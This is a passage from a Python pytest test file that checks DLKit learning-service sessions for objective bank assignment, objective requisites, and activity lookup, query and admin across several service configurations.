request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("objective_objective_bank_assignment_session_class_fixture", "objective_objective_bank_assignment_session_test_fixture")
class TestObjectiveObjectiveBankAssignmentSession(object):
"""Tests for ObjectiveObjectiveBankAssignmentSession"""
def test_can_assign_objectives(self):
"""Tests can_assign_objectives"""
# From test_templates/resource.py::ResourceBinAssignmentSession::can_assign_resources_template
result = self.session.can_assign_objectives()
assert isinstance(result, bool)
def test_can_assign_objectives_to_objective_bank(self):
"""Tests can_assign_objectives_to_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::can_assign_resources_to_bin_template
result = self.session.can_assign_objectives_to_objective_bank(self.assigned_catalog.ident)
assert isinstance(result, bool)
def test_get_assignable_objective_bank_ids(self):
"""Tests get_assignable_objective_bank_ids"""
# From test_templates/resource.py::ResourceBinAssignmentSession::get_assignable_bin_ids_template
# Note that our implementation just returns all catalogIds, which does not follow
# the OSID spec (should return only the catalogIds below the given one in the hierarchy.
if not is_never_authz(self.service_config):
results = self.session.get_assignable_objective_bank_ids(self.catalog.ident)
assert isinstance(results, IdList)
# Because we're not deleting all banks from all tests, we might
# have some crufty banks here...but there should be at least 2.
assert results.available() >= 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_assignable_objective_bank_ids(self.fake_id)
def test_get_assignable_objective_bank_ids_for_objective(self):
"""Tests get_assignable_objective_bank_ids_for_objective"""
# From test_templates/resource.py::ResourceBinAssignmentSession::get_assignable_bin_ids_for_resource_template
# Note that our implementation just returns all catalogIds, which does not follow
# the OSID spec (should return only the catalogIds below the given one in the hierarchy.
if not is_never_authz(self.service_config):
results = self.session.get_assignable_objective_bank_ids_for_objective(self.catalog.ident, self.objective_ids[0])
assert isinstance(results, IdList)
# Because we're not deleting all banks from all tests, we might
# have some crufty banks here...but there should be at least 2.
assert results.available() >= 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_assignable_objective_bank_ids_for_objective(self.fake_id, self.fake_id)
def test_assign_objective_to_objective_bank(self):
"""Tests assign_objective_to_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::assign_resource_to_bin_template
if not is_never_authz(self.service_config):
results = self.assigned_catalog.get_objectives()
assert results.available() == 0
self.session.assign_objective_to_objective_bank(self.objective_ids[1], self.assigned_catalog.ident)
results = self.assigned_catalog.get_objectives()
assert results.available() == 1
self.session.unassign_objective_from_objective_bank(
self.objective_ids[1],
self.assigned_catalog.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.session.assign_objective_to_objective_bank(self.fake_id, self.fake_id)
def test_unassign_objective_from_objective_bank(self):
"""Tests unassign_objective_from_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::unassign_resource_from_bin_template
if not is_never_authz(self.service_config):
results = self.assigned_catalog.get_objectives()
assert results.available() == 0
self.session.assign_objective_to_objective_bank(
self.objective_ids[1],
self.assigned_catalog.ident)
results = self.assigned_catalog.get_objectives()
assert results.available() == 1
self.session.unassign_objective_from_objective_bank(
self.objective_ids[1],
self.assigned_catalog.ident)
results = self.assigned_catalog.get_objectives()
assert results.available() == 0
else:
with pytest.raises(errors.PermissionDenied):
self.session.unassign_objective_from_objective_bank(self.fake_id, self.fake_id)
def test_reassign_proficiency_to_objective_bank(self):
"""Tests reassign_proficiency_to_objective_bank"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.reassign_proficiency_to_objective_bank(True, True, True)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_requisite_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.requisite_list = list()
request.cls.requisite_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveRequisiteSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for ObjectiveRequisiteSession Lookup'
create_form.description = 'Test Objective for ObjectiveRequisiteSession tests'
request.cls.objective = request.cls.catalog.create_objective(create_form)
for num in [0, 1]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveRequisiteSession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.requisite_list.append(obj)
request.cls.requisite_ids.append(obj.ident)
request.cls.catalog.assign_objective_requisite(request.cls.objective.ident, obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_requisite_session(proxy=PROXY)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj_id in request.cls.requisite_ids:
catalog.delete_objective(obj_id)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_requisite_session_test_fixture(request):
request.cls.session = request.cls.catalog
@pytest.mark.usefixtures("objective_requisite_session_class_fixture", "objective_requisite_session_test_fixture")
class TestObjectiveRequisiteSession(object):
"""Tests for ObjectiveRequisiteSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_lookup_objective_prerequisites(self):
"""Tests can_lookup_objective_prerequisites"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.can_lookup_objective_prerequisites()
def test_use_comparative_objective_view(self):
"""Tests use_comparative_objective_view"""
# From test_templates/resource.py ResourceLookupSession.use_comparative_resource_view_template
self.catalog.use_comparative_objective_view()
def test_use_plenary_objective_view(self):
"""Tests use_plenary_objective_view"""
# From test_templates/resource.py ResourceLookupSession.use_plenary_resource_view_template
self.catalog.use_plenary_objective_view()
def test_use_federated_objective_bank_view(self):
"""Tests use_federated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_federated_bin_view_template
self.catalog.use_federated_objective_bank_view()
def test_use_isolated_objective_bank_view(self):
"""Tests use_isolated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_isolated_bin_view_template
self.catalog.use_isolated_objective_bank_view()
def test_get_requisite_objectives(self):
"""Tests get_requisite_objectives"""
# From test_templates/learning.py::ObjectiveRequsiteSession::get_requisite_objectives_template
if not is_never_authz(self.service_config):
requisites = self.catalog.get_requisite_objectives(self.objective.ident)
assert requisites.available() == len(self.requisite_ids)
for req in requisites:
assert req.ident in self.requisite_ids
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_requisite_objectives(self.fake_id)
def test_get_all_requisite_objectives(self):
"""Tests get_all_requisite_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_all_requisite_objectives(True)
def test_get_dependent_objectives(self):
"""Tests get_dependent_objectives"""
# From test_templates/learning.py::ObjectiveRequsiteSession::get_dependent_objectives_template
if not is_never_authz(self.service_config):
dependents = self.catalog.get_dependent_objectives(self.objective.ident)
assert dependents.available() == 0
dependents = self.catalog.get_dependent_objectives(self.requisite_ids[0])
assert dependents.available() == 1
assert dependents.next().ident == self.objective.ident
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_dependent_objectives(self.fake_id)
def test_is_objective_required(self):
"""Tests is_objective_required"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.is_objective_required(True, True)
def test_get_equivalent_objectives(self):
"""Tests get_equivalent_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_equivalent_objectives(True)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_requisite_assignment_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
@pytest.fixture(scope="function")
def objective_requisite_assignment_session_test_fixture(request):
request.cls.requisite_list = list()
request.cls.requisite_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveRequisiteAssignmentSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for ObjectiveRequisiteAssignmentSession Lookup'
create_form.description = 'Test Objective for ObjectiveRequisiteAssignmentSession tests'
request.cls.objective = request.cls.catalog.create_objective(create_form)
for num in [0, 1]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveRequisiteAssignmentSession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.requisite_list.append(obj)
request.cls.requisite_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_requisite_assignment_session(proxy=PROXY)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj_id in request.cls.requisite_ids:
catalog.delete_objective(obj_id)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("objective_requisite_assignment_session_class_fixture", "objective_requisite_assignment_session_test_fixture")
class TestObjectiveRequisiteAssignmentSession(object):
"""Tests for ObjectiveRequisiteAssignmentSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_assign_requisites(self):
"""Tests can_assign_requisites"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.can_assign_requisites()
def test_assign_objective_requisite(self):
"""Tests assign_objective_requisite"""
# From test_templates/learning.py::ObjectiveRequsiteAssignmentSession::assign_objective_requisite_template
if not is_never_authz(self.service_config):
results = self.catalog.get_requisite_objectives(self.objective.ident)
assert isinstance(results, ABCObjects.ObjectiveList)
assert results.available() == 0
self.catalog.assign_objective_requisite(self.objective.ident, self.requisite_ids[0])
results = self.catalog.get_requisite_objectives(self.objective.ident)
assert results.available() == 1
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.assign_objective_requisite(self.fake_id, self.fake_id)
def test_unassign_objective_requisite(self):
"""Tests unassign_objective_requisite"""
# From test_templates/learning.py::ObjectiveRequsiteAssignmentSession::unassign_objective_requisite_template
if not is_never_authz(self.service_config):
self.catalog.assign_objective_requisite(self.objective.ident, self.requisite_ids[0])
results = self.catalog.get_requisite_objectives(self.objective.ident)
assert results.available() == 1
self.catalog.unassign_objective_requisite(self.objective.ident, self.requisite_ids[0])
results = self.catalog.get_requisite_objectives(self.objective.ident)
assert results.available() == 0
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.unassign_objective_requisite(self.fake_id, self.fake_id)
def test_assign_equivalent_objective(self):
"""Tests assign_equivalent_objective"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.assign_equivalent_objective(True, True)
def test_unassign_equivalent_objective(self):
"""Tests unassign_equivalent_objective"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.unassign_equivalent_objective(True, True)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def activity_lookup_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3A000000000000000000000000%40DLKIT.MIT.EDU')
@pytest.fixture(scope="function")
def activity_lookup_session_test_fixture(request):
request.cls.activity_list = list()
request.cls.activity_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ActivityLookupSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for Activity Lookup'
create_form.description = 'Test Objective for ActivityLookupSession tests'
request.cls.objective = request.cls.catalog.create_objective(create_form)
for num in [0, 1]:
create_form = request.cls.catalog.get_activity_form_for_create(request.cls.objective.ident, [])
create_form.display_name = 'Test Activity ' + str(num)
create_form.description = 'Test Activity for ActivityLookupSession tests'
obj = request.cls.catalog.create_activity(create_form)
request.cls.activity_list.append(obj)
request.cls.activity_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_activity_lookup_session(proxy=PROXY)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_activities():
catalog.delete_activity(obj.ident)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("activity_lookup_session_class_fixture", "activity_lookup_session_test_fixture")
class TestActivityLookupSession(object):
"""Tests for ActivityLookupSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_lookup_activities(self):
"""Tests can_lookup_activities"""
# From test_templates/resource.py ResourceLookupSession.can_lookup_resources_template
assert isinstance(self.catalog.can_lookup_activities(), bool)
def test_use_comparative_activity_view(self):
"""Tests use_comparative_activity_view"""
# From test_templates/resource.py ResourceLookupSession.use_comparative_resource_view_template
self.catalog.use_comparative_activity_view()
def test_use_plenary_activity_view(self):
"""Tests use_plenary_activity_view"""
# From test_templates/resource.py ResourceLookupSession.use_plenary_resource_view_template
self.catalog.use_plenary_activity_view()
def test_use_federated_objective_bank_view(self):
"""Tests use_federated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_federated_bin_view_template
self.catalog.use_federated_objective_bank_view()
def test_use_isolated_objective_bank_view(self):
"""Tests use_isolated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_isolated_bin_view_template
self.catalog.use_isolated_objective_bank_view()
def test_get_activity(self):
"""Tests get_activity"""
# From test_templates/resource.py ResourceLookupSession.get_resource_template
if self.svc_mgr.supports_activity_query():
if not is_never_authz(self.service_config):
self.catalog.use_isolated_objective_bank_view()
obj = self.catalog.get_activity(self.activity_list[0].ident)
assert obj.ident == self.activity_list[0].ident
self.catalog.use_federated_objective_bank_view()
obj = self.catalog.get_activity(self.activity_list[0].ident)
assert obj.ident == self.activity_list[0].ident
else:
with pytest.raises(errors.NotFound):
self.catalog.get_activity(self.fake_id)
else:
if not is_never_authz(self.service_config):
self.catalog.use_isolated_objective_bank_view()
obj = self.catalog.get_activity(self.activity_list[0].ident)
assert obj.ident == self.activity_list[0].ident
self.catalog.use_federated_objective_bank_view()
obj = self.catalog.get_activity(self.activity_list[0].ident)
assert obj.ident == self.activity_list[0].ident
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activity(self.fake_id)
def test_get_activities_by_ids(self):
"""Tests get_activities_by_ids"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_ids_template
from dlkit.abstract_osid.learning.objects import ActivityList
if self.svc_mgr.supports_activity_query():
objects = self.catalog.get_activities_by_ids(self.activity_ids)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_ids(self.activity_ids)
assert isinstance(objects, ActivityList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_activities_by_ids(self.activity_ids)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_ids(self.activity_ids)
assert objects.available() > 0
assert isinstance(objects, ActivityList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activities_by_ids(self.activity_ids)
def test_get_activities_by_genus_type(self):
"""Tests get_activities_by_genus_type"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_genus_type_template
from dlkit.abstract_osid.learning.objects import ActivityList
if self.svc_mgr.supports_activity_query():
objects = self.catalog.get_activities_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ActivityList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_activities_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_genus_type(DEFAULT_GENUS_TYPE)
assert objects.available() > 0
assert isinstance(objects, ActivityList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activities_by_genus_type(DEFAULT_GENUS_TYPE)
def test_get_activities_by_parent_genus_type(self):
"""Tests get_activities_by_parent_genus_type"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_parent_genus_type_template
from dlkit.abstract_osid.learning.objects import ActivityList
if self.svc_mgr.supports_activity_query():
if not is_never_authz(self.service_config):
objects = self.catalog.get_activities_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert objects.available() == 0
assert isinstance(objects, ActivityList)
else:
with pytest.raises(errors.Unimplemented):
# because the never_authz "tries harder" and runs the actual query...
# whereas above the method itself in JSON returns an empty list
self.catalog.get_activities_by_parent_genus_type(DEFAULT_GENUS_TYPE)
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_activities_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert objects.available() == 0
assert isinstance(objects, ActivityList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activities_by_parent_genus_type(DEFAULT_GENUS_TYPE)
def test_get_activities_by_record_type(self):
"""Tests get_activities_by_record_type"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_record_type_template
from dlkit.abstract_osid.learning.objects import ActivityList
if self.svc_mgr.supports_activity_query():
objects = self.catalog.get_activities_by_record_type(DEFAULT_TYPE)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_record_type(DEFAULT_TYPE)
assert objects.available() == 0
assert isinstance(objects, ActivityList)
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_activities_by_record_type(DEFAULT_TYPE)
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities_by_record_type(DEFAULT_TYPE)
assert objects.available() == 0
assert isinstance(objects, ActivityList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activities_by_record_type(DEFAULT_TYPE)
def test_get_activities_for_objective(self):
"""Tests get_activities_for_objective"""
# From test_templates/learning.py::ActivityLookupSession::get_activities_for_objective_template
if self.svc_mgr.supports_activity_query():
results = self.session.get_activities_for_objective(self.objective.ident)
assert isinstance(results, ABCObjects.ActivityList)
if not is_never_authz(self.service_config):
assert results.available() == 2
else:
assert results.available() == 0
else:
if not is_never_authz(self.service_config):
results = self.session.get_activities_for_objective(self.objective.ident)
assert results.available() == 2
assert isinstance(results, ABCObjects.ActivityList)
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_activities_for_objective(self.fake_id)
def test_get_activities_for_objectives(self):
"""Tests get_activities_for_objectives"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_activities_for_objectives(True)
def test_get_activities_by_asset(self):
"""Tests get_activities_by_asset"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_activities_by_asset(True)
def test_get_activities_by_assets(self):
"""Tests get_activities_by_assets"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_activities_by_assets(True)
def test_get_activities(self):
"""Tests get_activities"""
# From test_templates/resource.py ResourceLookupSession.get_resources_template
from dlkit.abstract_osid.learning.objects import ActivityList
if self.svc_mgr.supports_activity_query():
objects = self.catalog.get_activities()
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities()
assert isinstance(objects, ActivityList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_activities()
assert isinstance(objects, ActivityList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_activities()
assert objects.available() > 0
assert isinstance(objects, ActivityList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activities()
def test_get_activity_with_alias(self):
if not is_never_authz(self.service_config):
# Because you can't create the alias with NEVER_AUTHZ
self.catalog.alias_activity(self.activity_ids[0], ALIAS_ID)
obj = self.catalog.get_activity(ALIAS_ID)
assert obj.get_id() == self.activity_ids[0]
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def activity_query_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
@pytest.fixture(scope="function")
def activity_query_session_test_fixture(request):
request.cls.activity_list = list()
request.cls.activity_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ActivityQuerySession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for Assignment'
create_form.description = 'Test Objective for ProficiencyObjectiveBankAssignmentSession tests assignment'
request.cls.objective = request.cls.catalog.create_objective(create_form)
for color in ['Orange', 'Blue', 'Green', 'orange']:
create_form = request.cls.catalog.get_activity_form_for_create(request.cls.objective.ident, [])
create_form.display_name = 'Test Activity ' + color
create_form.description = (
'Test Activity for ActivityQuerySession tests, did I mention green')
obj = request.cls.catalog.create_activity(create_form)
request.cls.activity_list.append(obj)
request.cls.activity_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_activity_query_session(proxy=PROXY)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_activities():
request.cls.catalog.delete_activity(obj.ident)
request.cls.catalog.delete_objective(request.cls.objective.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("activity_query_session_class_fixture", "activity_query_session_test_fixture")
class TestActivityQuerySession(object):
"""Tests for ActivityQuerySession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_search_activities(self):
"""Tests can_search_activities"""
# From test_templates/resource.py ResourceQuerySession::can_search_resources_template
assert isinstance(self.session.can_search_activities(), bool)
def test_use_federated_objective_bank_view(self):
"""Tests use_federated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_federated_bin_view_template
self.catalog.use_federated_objective_bank_view()
def test_use_isolated_objective_bank_view(self):
"""Tests use_isolated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_isolated_bin_view_template
self.catalog.use_isolated_objective_bank_view()
def test_get_activity_query(self):
"""Tests get_activity_query"""
# From test_templates/resource.py ResourceQuerySession::get_resource_query_template
query = self.session.get_activity_query()
assert isinstance(query, ABCQueries.ActivityQuery)
def test_get_activities_by_query(self):
"""Tests get_activities_by_query"""
# From test_templates/resource.py ResourceQuerySession::get_resources_by_query_template
# Need to add some tests with string types
if not is_never_authz(self.service_config):
query = self.session.get_activity_query()
query.match_display_name('orange')
assert self.catalog.get_activities_by_query(query).available() == 2
query.clear_display_name_terms()
query.match_display_name('blue', match=False)
assert self.session.get_activities_by_query(query).available() == 3
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_activities_by_query(FakeQuery())
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def activity_admin_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.activity_list = list()
request.cls.activity_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ActivityAdminSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for Activity Admin'
create_form.description = 'Test Objective for ActivityAdminSession tests'
request.cls.objective = request.cls.catalog.create_objective(create_form)
request.cls.parent_object = request.cls.objective
for num in [0, 1]:
create_form = request.cls.catalog.get_activity_form_for_create(request.cls.objective.ident, [])
create_form.display_name = 'Test Activity ' + str(num)
create_form.description = 'Test Activity for ActivityAdminSession tests'
obj = request.cls.catalog.create_activity(create_form)
request.cls.activity_list.append(obj)
request.cls.activity_ids.append(obj.ident)
request.cls.form = request.cls.catalog.get_activity_form_for_create(request.cls.objective.ident, [])
request.cls.form.display_name = 'new Activity'
request.cls.form.description = 'description of Activity'
request.cls.form.genus_type = NEW_TYPE
request.cls.osid_object = request.cls.catalog.create_activity(request.cls.form)
else:
request.cls.catalog = request.cls.svc_mgr.get_activity_admin_session(proxy=PROXY)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_activities():
catalog.delete_activity(obj.ident)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
